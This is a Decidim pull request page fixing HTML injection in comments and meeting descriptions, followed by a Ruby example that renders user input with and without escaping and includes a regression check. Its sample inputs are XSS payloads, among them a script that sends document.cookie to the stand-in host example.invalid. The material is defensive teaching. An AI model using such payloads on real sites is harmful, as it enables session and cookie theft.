Fix HTML injection in comments and meeting's description #8511
Merged
andreslucena merged 4 commits into decidim:develop, Dec 10, 2021
Conversation
94c9206 to d7b2685
Member:
Good job @roxanaopr!! I tried it locally and it works as expected. Related to this PR, as we talked last week, I also added the explanation and screenshots on how the comments feature works.
355c40a to fe820f1
fe820f1 to 5656cde
andreslucena (Member) requested changes, Nov 29, 2021:
Great job on moving the proposal sanitization logic and reusing that for meetings! 👏🏽
I have a few suggestions, could you please check them?
Also, there are some merge conflicts to solve.
Thanks for this PR!!
Review thread on decidim-meetings/spec/presenters/decidim/meetings/meeting_presenter_spec.rb (outdated, resolved)
2fd235c to b4fc267
8163a35 to 8835683
andreslucena (Member) approved these changes, Dec 10, 2021:
Thanks for the PR @roxanaopr
entantoencuanto added a commit to PopulateTools/decidim that referenced this pull request, Dec 10, 2021:
* fix/meetings_form_embed_type_visibility:
  Fix tests by adding missing doubled attributes
  Include value in validation conditional
  Allow participants to set iframe access level of meetings
  Fix embed type visibility in participants form
  Remove blank option in meetings embed type select
  Fix avatar thumbnail in participants' profile (decidim#8577)
  Fix HTML injection in comments and meeting's description (decidim#8511)
  Add search, filters and sorting to admin panel budget projects (decidim#8592)
  Add cache key separator to cache_hash (decidim#8559)
  Move social login buttons to the top of the login modal (decidim#8574)
  Fix the meeting copy functionality (decidim#8430)
  Temporarily ignore CSS validation issue in CI (decidim#8597)
  Fix security instructions (decidim#8587)
alecslupu pushed a commit to i-need-another-coffee/decidim that referenced this pull request, Dec 14, 2021
alecslupu pushed a commit to i-need-another-coffee/decidim that referenced this pull request, Dec 23, 2021
🎩 What? Why?
The comment body and the meeting description are not escaping the HTML structure.
Trying to submit a comment on a proposal/meeting that contains HTML code will result in that code being treated as part of the page. This was observed as well on the description field of meetings.
📌 Related Issues
Testing
Add the following comment on a comment or meeting
The HTML structure will be rendered in the page.
📷 Screenshots
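The description above says that HTML submitted in a comment body or a meeting description is "treated as part of the page". The following is an added example, not Decidim's code and not the fix merged in this PR: it reproduces that behaviour with a plain ERB template (which, unlike Rails views, does not escape `<%= %>` output), shows the escaped rendering beside it, and includes a small check of the kind a regression spec can run to confirm no tag from user input survives into the page. The template, the `render_field` / `injected_tags` helpers and the two sample inputs are all constructed for this example; Decidim's actual fix reuses its proposal sanitization logic for meetings, which is an allowlist sanitizer rather than the full escaping used here.

```ruby
# Added example (not Decidim's code). Ruby standard library only.
require "erb"

# Constructed sample inputs: what a participant might submit through the
# comment form and the meeting description field.
COMMENT_BODY = '<img src=x onerror="alert(1)">Looks good to me'
MEETING_DESCRIPTION = "Agenda<script>document.location='https://example.invalid/?c='+document.cookie</script>"

# Constructed view fragment. `label` is application-controlled; `value` is the
# user-controlled field. Plain ERB does NOT escape <%= %>, so whatever is passed
# as `value` is interpolated as markup.
TEMPLATE = <<~ERB
  <section class="<%= label %>">
    <div class="content"><%= value %></div>
  </section>
ERB

# Tags the template itself emits; anything else in the output came from input.
TEMPLATE_TAGS = %w[section div].freeze

# Renders one field. With escape: false this is the vulnerable behaviour the PR
# describes; with escape: true every '<', '>', '&', '"' and "'" in the value
# becomes an entity, so the browser shows the submitted HTML as text.
def render_field(label:, value:, escape: true)
  safe_value = escape ? ERB::Util.html_escape(value) : value
  ERB.new(TEMPLATE).result_with_hash(label: label, value: safe_value)
end

# Regression check: returns the tag names in the rendered HTML that the
# template did not put there. An empty array means no injected markup.
# (A regex is enough here because we only ask whether a '<name' token exists;
# it is not a sanitizer and must not be used as one.)
def injected_tags(rendered_html)
  names = rendered_html.scan(%r{<\s*/?\s*([a-zA-Z][a-zA-Z0-9]*)}).flatten
  names.map(&:downcase).uniq - TEMPLATE_TAGS
end

if __FILE__ == $PROGRAM_NAME
  [["comment-body", COMMENT_BODY], ["meeting-description", MEETING_DESCRIPTION]].each do |label, value|
    puts "== #{label}, unescaped (vulnerable) =="
    unescaped = render_field(label: label, value: value, escape: false)
    puts unescaped
    puts "injected tags: #{injected_tags(unescaped).inspect}"

    puts "== #{label}, escaped =="
    escaped = render_field(label: label, value: value)
    puts escaped
    puts "injected tags: #{injected_tags(escaped).inspect}"
  end
end
```

Escaping is the strictest option and is right for a plain-text field. Where a field is meant to carry rich text, as a meeting description can, the practical choice is an allowlist sanitizer that keeps a fixed set of formatting tags and drops everything else, which is the approach the reviewer describes as "reusing the proposal sanitization logic for meetings"; the `injected_tags` check still applies, with the allowed tags added to the list it ignores.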